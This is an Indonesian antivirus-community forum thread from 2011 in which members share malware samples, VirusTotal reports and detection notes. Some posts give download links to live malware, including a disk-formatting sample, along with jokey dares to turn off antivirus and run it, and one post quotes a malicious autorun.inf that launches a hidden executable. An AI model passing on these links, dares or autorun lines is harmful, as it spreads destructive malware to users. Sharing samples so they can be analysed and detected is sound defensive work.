Ditulis oleh: khuga pada April 29, 2011, 12:49:07 PM
kalau sudah kena virus cwsandbox ini file pasti ada tiba2. kemungkinan ini virusnya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada April 29, 2011, 01:06:11 PM
kalau sudah kena virus cwsandbox ini file pasti ada tiba2. kemungkinan ini virusnya

klo ini nih baru bneran virus . . .

(http://i54.tinypic.com/e0rddd.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: zerox95 pada April 29, 2011, 01:32:32 PM
 :-\ :-\ aq setuju sama kamu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada April 29, 2011, 02:32:19 PM
kalau sudah kena virus cwsandbox ini file pasti ada tiba2. kemungkinan ini virusnya

klo ini nih baru bneran virus . . .

(http://i54.tinypic.com/e0rddd.jpg)
aneh sangat ga bisa ke DL full virus nya kudu di blok ESET dan yg aneh nya lagi dah di Quarantine tapi ga bsa di restore  :o ~x(
sxpun filee rar nya ga ada  =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada April 29, 2011, 05:15:58 PM
kalau sudah kena virus cwsandbox ini file pasti ada tiba2. kemungkinan ini virusnya
banyak av yang detek virustotal (http://www.virustotal.com/file-scan/report.html?id=dc4075b033bb0155fe38c7f0362beadf0a11277305d5efaa257af85ccc2e3fae-1304071173)
Malwarebyte detek sebagai spyware :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: khuga pada April 30, 2011, 01:12:07 PM
thank atas solusinya  :-bd :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Beruang pada Mei 05, 2011, 06:09:52 AM
kok mkin kemari mkin jadi tempat promosi hotel ??  >:( wah gak bener nih...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: zerox95 pada Mei 05, 2011, 02:11:50 PM
benarkah ada virus yg nyebar di fb
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: sarono pada Mei 31, 2011, 08:08:00 AM
Ok langsung upload deh kalau nemu virus yang bandel. biar obatnya cepet ketemu :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Juni 03, 2011, 01:11:13 PM
ini ada spesimen baru trojan dapet dari warnet terdekat, padahal dia udah pake smadav looh :D

pas discan cuman beberapa di detek ranmit

http://www.virustotal.com/file-scan/report.html?id=e3d30b14b89a227dbe2d85a388517d6fa28684336233475598e37bc2860ed27b-1306760259
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 03, 2011, 01:15:45 PM
ini ada spesimen baru trojan dapet dari warnet terdekat, padahal dia udah pake smadav looh :D
pas discan cuman beberapa di detek ranmit
http://www.virustotal.com/file-scan/report.html?id=e3d30b14b89a227dbe2d85a388517d6fa28684336233475598e37bc2860ed27b-1306760259
sampe sekarang juga smadav bisa detect ranmit yang varian apa seh ???
waktu kemaren tes injek ranmit tetap aja smadav adem ayem aja  :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Juni 03, 2011, 02:12:42 PM
ini ada spesimen baru trojan dapet dari warnet terdekat, padahal dia udah pake smadav looh :D
pas discan cuman beberapa di detek ranmit
http://www.virustotal.com/file-scan/report.html?id=e3d30b14b89a227dbe2d85a388517d6fa28684336233475598e37bc2860ed27b-1306760259
sampe sekarang juga smadav bisa detect ranmit yang varian apa seh ???
waktu kemaren tes injek ranmit tetap aja smadav adem ayem aja  :o
kurang tau bro, soalnya udah keburu modar alias di delete  :-[
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 03, 2011, 07:26:13 PM
ini ada spesimen baru trojan dapet dari warnet terdekat, padahal dia udah pake smadav looh :D
pas discan cuman beberapa di detek ranmit
http://www.virustotal.com/file-scan/report.html?id=e3d30b14b89a227dbe2d85a388517d6fa28684336233475598e37bc2860ed27b-1306760259
sampe sekarang juga smadav bisa detect ranmit yang varian apa seh ???
waktu kemaren tes injek ranmit tetap aja smadav adem ayem aja  :o
kurang tau bro, soalnya udah keburu modar alias di delete  :-[
trus delete nya pake apa ???
ga mungkin kan pake smadav  :-[
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Juni 03, 2011, 07:31:27 PM
td ada virus baru di kampus yg kedetect pke heuristic nya Kaspers, udh gua arsipin sih tp lupa kagak gua bwa pulang, mw aplod dri kampus inet cacad sangat :P
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: debagabig pada Juni 03, 2011, 08:15:05 PM
iya nih rda bngung jga...
dcmpus kmren uda pke smad pro pula ats nma camp...
eh pas sya cba jlan.n ato ekstrak ramnit yg kmren sya dunlud smadx grespon gan...
knpa yah?
mw uplod smplex tpi sya dnlodx aj kmren dr forsmad jg kok...wkwkwk
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 03, 2011, 08:24:36 PM
kan smadav 8.5 hanya Pendeteksian khusus untuk virus Ramnit.shortcut.
jadi yang bisa diditeksi baru shortcutnya aja.sementara virusnya belum dikenali oleh smadav 8.5
shortcutnya itupun baru sortcut yang ada di flasdisk,kalau sortcut ranmitnya adanya di hardisk smadav harus di beri perintah scan dulu baru dianya dapat menditeksi keberadaan shortcut ranmitnya.

mudah-mudahan di update minggu depan hal ini sudah di perbaiki. 8)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 03, 2011, 08:51:23 PM
kan smadav 8.5 hanya Pendeteksian khusus untuk virus Ramnit.shortcut.
jadi yang bisa diditeksi baru shortcutnya aja.sementara virusnya belum dikenali oleh smadav 8.5
shortcutnya itupun baru sortcut yang ada di flasdisk,kalau sortcut ranmitnya adanya di hardisk smadav harus di beri perintah scan dulu baru dianya dapat menditeksi keberadaan shortcut ranmitnya.
mudah-mudahan di update minggu depan hal ini sudah di perbaiki. 8)
o0o... ^-^
ia juga ya cuma yang shortcut aja  :D
qt berharap aja supaya secepatnya dah di perbaiki  ;)
masa seh kalah ma AV yg lagi naek daun  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 03, 2011, 08:59:09 PM
ini ada spesimen baru trojan dapet dari warnet terdekat, padahal dia udah pake smadav looh :D

pas discan cuman beberapa di detek ranmit

http://www.virustotal.com/file-scan/report.html?id=e3d30b14b89a227dbe2d85a388517d6fa28684336233475598e37bc2860ed27b-1306760259
download----extrac ---langsung dibabat abis sama mcafee  :D
detek as W32 ranmit.A
             PWS-Zboot.gen.di
          


(http://i54.tinypic.com/mttow8.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Angga ssj pada Juni 04, 2011, 09:04:50 PM
Nama Virus : Security Tool
Type : Worm

Ini virus ap ya ?
Mana d.local disk C lgi huuu,,
Udh d.clear pake smadav 8.5 , scan ulang keluar lgi , jumlah sama , mpe registry saya kena 2 TT,,

Ada yg bsa bntu ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 04, 2011, 09:07:03 PM
Nama Virus : Security Tool
Type : Worm

Ini virus ap ya ?
Mana d.local disk C lgi huuu,,
Udh d.clear pake smadav 8.5 , scan ulang keluar lgi , jumlah sama , mpe registry saya kena 2 TT,,

Ada yg bsa bntu ?
bisa kirim sampelnya kesini gan. http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/ (http://smadaver.com/konsultasi-virus/upload-virus-ke-forum/)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 12, 2011, 10:54:50 AM
yang pengen cara cepat Format HD nya silahkan tes Virus ini  >=)
http://www.mediafire.com/?r3nzhk9ga4fo4ab
dah di buktikan oleh 2 mastah dsini  =)) =)) =))
Sekedar saran aja :
kalo pengen maen2 dgn virus ini sebaiknya semua Drive nya di Hidden deh  :-[
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 12, 2011, 04:42:41 PM
Saya ingatkan buat para member disini bila ingin mencoba virus ini sebaiknya backup semua file yg ada di HD :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 12, 2011, 05:46:36 PM
yang pengen cara cepat Format HD nya silahkan tes Virus ini  >=)
http://www.mediafire.com/?r3nzhk9ga4fo4ab
dah di buktikan oleh 2 mastah dsini  =)) =)) =))
Sekedar saran aja :
kalo pengen maen2 dgn virus ini sebaiknya semua Drive nya di Hidden deh  :-[
DANGER DANGER DANGER DANGER DANGER

(http://www.latzinator.com/PatentMinesDanger.480.png)
HANYA UNTUK ORANG YANG BENAR-BENAR BERPENGALAMAN
AMATIRAN DILARANG KERAS UNTUK MENCOBA VIRUS INI
RESIKO DITANGGUNG SENDIRI

IAM NOT JUNK I JUST WARNING
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 12, 2011, 08:59:03 PM
@b_agoy and 《manggolo》
keqnya trauma banget ya  =)) =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Juni 12, 2011, 09:19:48 PM
@b_agoy and 《manggolo》
keqnya trauma banget ya  =)) =)) =))

udh ane coba tp tdk terjadi apa2 :P kasper ngedetect klo ini bukan virus, tp program legal yg bisa berpotensi bahaya :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 12, 2011, 09:58:47 PM
@b_agoy and 《manggolo》
keqnya trauma banget ya  =)) =)) =))

udh ane coba tp tdk terjadi apa2 :P kasper ngedetect klo ini bukan virus, tp program legal yg bisa berpotensi bahaya :)
kalau @ yang satu ini mang dah masuk dalam daftar orang-orang yang benar-benar berpengalaman.
makanya bisa tidak terjadi apa-apa.
btw;udah cobanya itu dah dicoba di run di luar rar ( diextrac trus dirun ) sama di run file hasil cloningannya.
pake deepfeze kah
makasih mastah  ^:)^ ^:)^ ^:)^

jangan ditiru
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 13, 2011, 07:54:17 AM
@b_agoy and 《manggolo》
keqnya trauma banget ya  =)) =)) =))
udh ane coba tp tdk terjadi apa2 :P kasper ngedetect klo ini bukan virus, tp program legal yg bisa berpotensi bahaya :)
kalau @ yang satu ini mang dah masuk dalam daftar orang-orang yang benar-benar berpengalaman.
makanya bisa tidak terjadi apa-apa.
btw;udah cobanya itu dah dicoba di run di luar rar ( diextrac trus dirun ) sama di run file hasil cloningannya.
pake deepfeze kah
makasih mastah  ^:)^ ^:)^ ^:)^

jangan ditiru

sangat tidak di sarankan bagi HD nya yg berisi data penting  =)) =)) =))
misalkan Tugas Akhir  :'(
tapi waktu kemaren pake ESET dah bisa detect koq bro  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 15, 2011, 12:42:18 AM
wah virusnya nantang tuh :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 15, 2011, 12:45:57 AM
Coba aja bro kalo mau nekat hihihi... ;> :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 15, 2011, 12:54:54 AM
boleh :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 15, 2011, 12:59:26 AM
boleh :)
Kalau gitu sekalian ama variannya ni gan.biar mantab :-bd :-bd
http://www.4shared.com/file/-JD2Ld4V/ultra_surf.html (http://www.4shared.com/file/-JD2Ld4V/ultra_surf.html)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 15, 2011, 01:03:56 AM
Wah beneran nih bro Jastis :D
Reviewnya yak hehe,,, :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 15, 2011, 02:15:02 AM
hehehehe
tunggu testing dulu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 15, 2011, 05:23:20 AM
hehehehe
tunggu testing dulu
kalo mau cobain mati in dulu AV nya bro trus run  virus nya  =))
dan lihat apa yg akan terjadi nanti  8)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 15, 2011, 06:06:32 AM
hehehehe
tunggu testing dulu
kalo mau cobain mati in dulu AV nya bro trus run  virus nya  =))
dan lihat apa yg akan terjadi nanti  8)

tunggu saya test ya..filenya sudah di download kok :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Sikatro pada Juni 15, 2011, 10:01:19 AM
ultrasurf ya? ???  bedah dong disini.kan udah ada thread bedah virus. ayo dong mastah-mastah disini coba bedah nih virusnya gw pengen liat cara bedah mastah2 disini :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 15, 2011, 10:19:07 AM
Ane dah kapok ma ni virus xixixi...
Pertama gak tau efeknya kemarin trnyata bs ngeformat :o :o
Untung aja file2 penting bs terselamatkan pake software recovery. Secara ane gak punya kompi cadangan bwt ngetes. Punya laptop cm 1 n gak punya HD External. Jadi mau ngetes lg musti mikir 2x =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada Juni 15, 2011, 11:17:12 AM
kok ga ada efek'a ya?!
pertama gw baca file notepad'a,
beeh, menggairahkan kita tuk coba run file exe'a
 :-\
tp pas gw run exe'a malah kesedot AV,
gw matiin AV'a, skut" aje kompi,
bukan'a nantang c, tp cumanx pengen tau aja.

piss....  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 15, 2011, 11:21:57 AM
kok ga ada efek'a ya?!
pertama gw baca file notepad'a,
beeh, menggairahkan kita tuk coba run file exe'a
 :-\
tp pas gw run exe'a malah kesedot AV,
gw matiin AV'a, skut" aje kompi,
bukan'a nantang c, tp cumanx pengen tau aja.
piss....  :D
waktu run exe nya AV nya di mati in dulu kale  =))
kalo waktu eksekusi exe trus AV nya nyala sama aja tuh  :P
mati in dulu AV nya trus cobain dah  >=)
sangat tidak di sarankan kalo HD nya berisi data2 penting  =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 15, 2011, 06:16:54 PM
Dah dapet korban belom bro  =)) =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 15, 2011, 10:38:00 PM
Dah dapet korban belom bro  =)) =)) =))
keqnya masih anda berdua deh korban nya  =)) =))
lom terdeteksi korban baru keqnya  ;> ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada Juni 16, 2011, 01:10:28 PM
waktu run exe nya AV nya di mati in dulu kale  =))
kalo waktu eksekusi exe trus AV nya nyala sama aja tuh  :P
mati in dulu AV nya trus cobain dah  >=)
sangat tidak di sarankan kalo HD nya berisi data2 penting  =))

udah om pham, AV dah dimatikan, tp ga terjadi apa,,
 :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mapix pada Juni 16, 2011, 01:23:07 PM
Virus baru  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada Juni 16, 2011, 01:52:28 PM
Virus baru  :D

new heur_PE ya gan,,
icon exe'a keren jg,  8)
boleh neh virus, TRY THIS !
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mapix pada Juni 16, 2011, 03:27:27 PM
Virus baru  :D

new heur_PE ya gan,,
icon exe'a keren jg,  8)
boleh neh virus, TRY THIS !
monggo dicoba, tapi resiko ditanggung penumpang ya Gan.  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Juni 16, 2011, 06:16:43 PM
ada yg mw coba2 neh sample ?  :D
password : virus
http://www.mediafire.com/?i4invbrraohbehn
http://www.mediafire.com/?qh5ss5g33nk3wna
http://www.mediafire.com/?z0xdze0aas6vk1m

http://www.virustotal.com/file-scan/report.html?id=e82865f3db26ca205ba52203b0fa7d17c91d753191779cb2265917f4b422cabd-1308222032
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 16, 2011, 06:18:26 PM
Kalau boleh tau bocorannya
itu virus apaan gan. 8)
Apa ni virus bikin kita nggak bisa login, ^:)^
barusan saya scan pake esset hasilnya nihil.tapi saya buka pake notepad ni beneran virus.
baru bikin ya masatah virusnya  :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada Juni 16, 2011, 06:38:10 PM
Kalau boleh tau bocorannya
itu virus apaan gan. 8)
Apa ni virus bikin kita nggak bisa login, ^:)^
barusan saya scan pake esset hasilnya nihil.tapi saya buka pake notepad ni beneran virus.
baru bikin ya masatah virusnya  :-bd :-bd

cobain deh biar tau  ;> ga terlalu bahaya kok wkwkwkkw :P :P

o iya ini bukan ane yg bikin :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 16, 2011, 06:43:44 PM
Siap mastah ! >=) >=)
Kapan ni rencananya mastah mau bikin virus =)) =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: si saprol pada Juni 17, 2011, 12:40:23 PM
@agan manggalo,
dah dicoba lom virus by mapix diatas?!
kenceng nyebar'a !
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 24, 2011, 03:07:32 AM
Wah beneran nih bro Jastis :D
Reviewnya yak hehe,,, :-bd

kok gk ngaruh ya :D
padahal gk ada antivirus di my compi
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 24, 2011, 07:49:16 AM
Wah beneran nih bro Jastis :D
Reviewnya yak hehe,,, :-bd
kok gk ngaruh ya :D
padahal gk ada antivirus di my compi
wedew emang compi Mastah neh bahaya juga ga pake AV  ^:)^ ^:)^ ^:)^
ada tips and trik nya mastah  :)
atw jgn2 pake semacam deepfrezze gitu  :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 24, 2011, 08:03:02 AM
Wah beneran nih bro Jastis :D
Reviewnya yak hehe,,, :-bd

kok gk ngaruh ya :D
padahal gk ada antivirus di my compi

Hmm,,,
Kok bisa yah, padahal korban dtmpat lain lmyan banyak loh :-\
Kronologisnya gmna neh :D :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 24, 2011, 08:33:42 AM
Hmm,,,
Kok bisa yah, padahal korban dtmpat lain lmyan banyak loh :-\
Kronologisnya gmna neh :D :D
emang compi nya dewa tuh ga pake AV tapi koq bisa sakti gitu ya  >=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 24, 2011, 09:14:25 AM
Wah, beda ya compinya dewa ma manusia biasa?? =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 24, 2011, 11:25:37 PM
Wah beneran nih bro Jastis :D
Reviewnya yak hehe,,, :-bd

kok gk ngaruh ya :D
padahal gk ada antivirus di my compi

Hmm,,,
Kok bisa yah, padahal korban dtmpat lain lmyan banyak loh :-\
Kronologisnya gmna neh :D :D
tuh file gw jalankan dari rar....
trus emg sempat hang tuh kompi....trus gw restart

tidak pake defreeze
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 24, 2011, 11:26:32 PM
Hmm,,,
Kok bisa yah, padahal korban dtmpat lain lmyan banyak loh :-\
Kronologisnya gmna neh :D :D
emang compi nya dewa tuh ga pake AV tapi koq bisa sakti gitu ya  >=)
hahahahahah
belum sempat aja pasang av :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 24, 2011, 11:37:04 PM
tuh file gw jalankan dari rar....
trus emg sempat hang tuh kompi....trus gw restart
tidak pake defreeze
trus data2 di HD ga hilang kah  :-\
kalo kata bro mang ( pernah jadi korban  ;> ) seandainya HD di hidden tuh pasti ga ngefek tuh virusnya  :P
hahahahahah
belum sempat aja pasang av :D
wedew emang compi dewa neh  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 25, 2011, 12:34:53 AM
tuh file gw jalankan dari rar....
trus emg sempat hang tuh kompi....trus gw restart
tidak pake defreeze
trus data2 di HD ga hilang kah  :-\
kalo kata bro mang ( pernah jadi korban  ;> ) seandainya HD di hidden tuh pasti ga ngefek tuh virusnya  :P
hahahahahah
belum sempat aja pasang av :D
wedew emang compi dewa neh  ^:)^

klo data HD hilang kan gk mungkin bisa booting,apalagi sampe system restore :D
nahgw cuman baliin system restorenya aja dan beres tuh kompi :D


testing [at] W7
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 25, 2011, 12:48:43 AM
Virus ini emang targetnya adalah memformat disk D,E,F dan seterusnya
dia tidak menginfeksi file-2 lainnya.
mungkin akan lain hasilnya jika bro jastis tidak menjalankan ni virus didalam rar tapi mengextracknya terlebih dulu
berani menerima tantangan  :D :D :D
resiko kehilangan data ditanggung sendiri  ;D ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 25, 2011, 12:58:56 AM
Virus ini emang targetnya adalah memformat disk D,E,F dan seterusnya
dia tidak menginfeksi file-2 lainnya.
mungkin akan lain hasilnya jika bro jastis tidak menjalankan ni virus didalam rar tapi mengextracknya terlebih dulu
berani menerima tantangan  :D :D :D
resiko kehilangan data ditanggung sendiri  ;D ;D

drive D dan E   tidak tersentuh sama sekali bro..
ntr gw coba untuk mengextractnya
waiting for this testing :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 25, 2011, 01:11:48 AM
drive D dan E   tidak tersentuh sama sekali bro..
ntr gw coba untuk mengextractnya
waiting for this testing :D
Emang pantas Bro jastis ni menyandang gelar ketua momod  :-bd :-bd
Maju terus bro  :-X :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 25, 2011, 01:17:42 AM
heheheh
kan perlu percobaan untuk mengetahui kebenaran :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 25, 2011, 02:33:18 AM
Ane gak ikutan ah...
Dah kapok :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 25, 2011, 12:09:24 PM
heheheh
kan perlu percobaan untuk mengetahui kebenaran :D
dah ga salah lagi emang neh gelar kemod  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: choky$ pada Juni 26, 2011, 09:12:34 AM
gw pake win 7...scan pake smadav hasilnya viruss ini...tlg ya bro
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 26, 2011, 08:54:53 PM
heheheh
kan perlu percobaan untuk mengetahui kebenaran :D
dah ga salah lagi emang neh gelar kemod  :)

hahahah
nih virus membuat file baru,ada tiga file di dicreate di folder dimana file ultrasurf.exe disimpan :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 26, 2011, 10:02:55 PM
heheheh
kan perlu percobaan untuk mengetahui kebenaran :D
dah ga salah lagi emang neh gelar kemod  :)

hahahah
nih virus membuat file baru,ada tiga file di dicreate di folder dimana file ultrasurf.exe disimpan :D
yup emang gitu gan, kalau file baru itu dijalanin lagi baru ..........
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: zen_fadil pada Juni 26, 2011, 10:23:09 PM
ane uda pernah copy data gan. yg baru download dr warnet, setelah data di buka. eh, muncul bnyak shortcut.. hu. jalan terakhir ya inul / instal ulg..
bro jastis top markotop pokoknya.  :-bd  :-X  :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 26, 2011, 10:55:52 PM
heheheh
kan perlu percobaan untuk mengetahui kebenaran :D
dah ga salah lagi emang neh gelar kemod  :)

hahahah
nih virus membuat file baru,ada tiga file di dicreate di folder dimana file ultrasurf.exe disimpan :D
yup emang gitu gan, kalau file baru itu dijalanin lagi baru ..........

tapi satupun gk ada pengaruh,cuman restart explorer dan restart kompi...
karena waktu jalanin terlebih dahulu gw buka task managaer,jadi bisa buka lagi explorernya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Juni 27, 2011, 01:23:45 AM
tapi satupun gk ada pengaruh,cuman restart explorer dan restart kompi...
karena waktu jalanin terlebih dahulu gw buka task managaer,jadi bisa buka lagi explorernya

Satu kata yang dapat ane katakan "selamat"  :-bd
Seharusnya kalau kompinya nggak pake deepfreze disk D/e terformat pada sat start up berikutnya
ada tips kusus yang dapat dibagi disini ?
penanganan pake task manager misalnya apakah ada proses yang di kill ?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Juni 27, 2011, 01:57:55 AM
sudah pasti ada yg dikill
klo klita menjalankan  file ultrasurf.exe maka secara otomatis akan muncul di proses,begitu juga file lainnya,seperti alaskan ip.exe dam wdma.exe klo gk salah,satu lagi lupa ane,karena filenya bila di eksekusi kompi langsung restart walaupun sudah buka task managaer :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juni 27, 2011, 07:34:08 AM
sudah pasti ada yg dikill
klo klita menjalankan  file ultrasurf.exe maka secara otomatis akan muncul di proses,begitu juga file lainnya,seperti alaskan ip.exe dam wdma.exe klo gk salah,satu lagi lupa ane,karena filenya bila di eksekusi kompi langsung restart walaupun sudah buka task managaer :D
emang tuh gelar ga salah orang  ^:)^ ^:)^ ^:)^
jadi sblm run tuh di buka task dulu ya spy tetap jaga2  >=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: darkslayer pada Juni 27, 2011, 10:05:37 AM
mohon bantuan nya.

pagi ini saya menemukan autorun.inf dgn attrib ASHR pada network drive /folder sharing komputer server saya , dimana permissionnya FUll control.

seperti biasa autorun.inf nya terdapat karakter2 g jelas tp cm sebatas comentar, setelah saya pilah2 terdapat script ini:
Kode: [Pilih]
[Autorun]
open=~RecycleBin\b429046.exe
icon=%windir%\system32\SHELL32.dll,4
action=View files with Explorer on the drive
shell\open=Open
shell\open\command=~RecycleBin\b429046.exe
shell\explore=Explore
shell\explore\command=~RecycleBin\b429046.exe
shell\search=Search...
shell\search\command=~RecycleBin\b429046.exe
useautoplay=1

Saya pun beranjak ke folder ~RecycleBin untuk menemukan file b429046.exe (attrib SHR)
Saya scan menggunakan smadav dan avira tidak terdeteksi apa2.
Saya upload ke virustotal.com juga tidak mendapat beberapa info berarti di sana.
berikut report virustotal.com
Kutip
Antivirus results
AhnLab-V3 - 2011.06.27.00 - 2011.06.26 - -
AntiVir - 7.11.10.106 - 2011.06.27 - -
Antiy-AVL - 2.0.3.7 - 2011.06.26 - -
Avast - 4.8.1351.0 - 2011.06.26 - -
Avast5 - 5.0.677.0 - 2011.06.26 - -
AVG - 10.0.0.1190 - 2011.06.27 - -
BitDefender - 7.2 - 2011.06.27 - -
CAT-QuickHeal - 11.00 - 2011.06.26 - -
ClamAV - 0.97.0.0 - 2011.06.27 - -
Commtouch - 5.3.2.6 - 2011.06.26 - -
Comodo - 9196 - 2011.06.26 - -
DrWeb - 5.0.2.03300 - 2011.06.27 - -
eSafe - 7.0.17.0 - 2011.06.23 - -
eTrust-Vet - 36.1.8405 - 2011.06.24 - -
F-Prot - 4.6.2.117 - 2011.06.26 - -
F-Secure - 9.0.16440.0 - 2011.06.27 - -
Fortinet - 4.2.257.0 - 2011.06.27 - -
GData - 22 - 2011.06.27 - -
Ikarus - T3.1.1.104.0 - 2011.06.27 - -
Jiangmin - 13.0.900 - 2011.06.26 - -
K7AntiVirus - 9.106.4840 - 2011.06.24 - -
Kaspersky - 9.0.0.837 - 2011.06.27 - -
McAfee - 5.400.0.1158 - 2011.06.27 - -
McAfee-GW-Edition - 2010.1D - 2011.06.27 - -
Microsoft - 1.7000 - 2011.06.26 - -
NOD32 - 6241 - 2011.06.27 - -
Norman - 6.07.10 - 2011.06.25 - HTML/Agent.ML
nProtect - 2011-06-26.01 - 2011.06.27 - -
Panda - 10.0.3.5 - 2011.06.26 - -
PCTools - 8.0.0.5 - 2011.06.23 - -
Prevx - 3.0 - 2011.06.27 - -
Rising - 23.63.04.01 - 2011.06.24 - -
Sophos - 4.66.0 - 2011.06.27 - -
SUPERAntiSpyware - 4.40.0.1006 - 2011.06.26 - Rogue.Agent/Gen--o[EXE]
Symantec - 20111.1.0.186 - 2011.06.27 - -
TheHacker - 6.7.0.1.241 - 2011.06.26 - -
TrendMicro - 9.200.0.1012 - 2011.06.26 - -
TrendMicro-HouseCall - 9.200.0.1012 - 2011.06.27 - -
VBA32 - 3.12.16.3 - 2011.06.24 - -
VIPRE - 9704 - 2011.06.27 - -
ViRobot - 2011.6.27.4534 - 2011.06.27 - -
VirusBuster - 14.0.96.0 - 2011.06.26 - -
File info:
MD5: 8619b0e2f195cf37d440ee201f62d7c0
SHA1: e612c3b903ce3bfb0a468bad75bd231ed436ab8b
SHA256: d777900a2dbc5c3d595ae17e274b5c49a4f38002acaf2b405670404bee90eafb
File size: 1094 bytes
Scan date: 2011-06-27 02:47:03 (UTC)

Meskipun report nya tidak ada, tapi saya tetep menaruh curiga terhadap file tersbut. karena jarang ada software yang masih menggunakan autorun.inf dalam menjalankan program nya saat ini kecuali CD/DVD
File tersebut saya attach di bawah. terima kasih.
Judul: Re: Re: Upload VIRUS ke Forum..
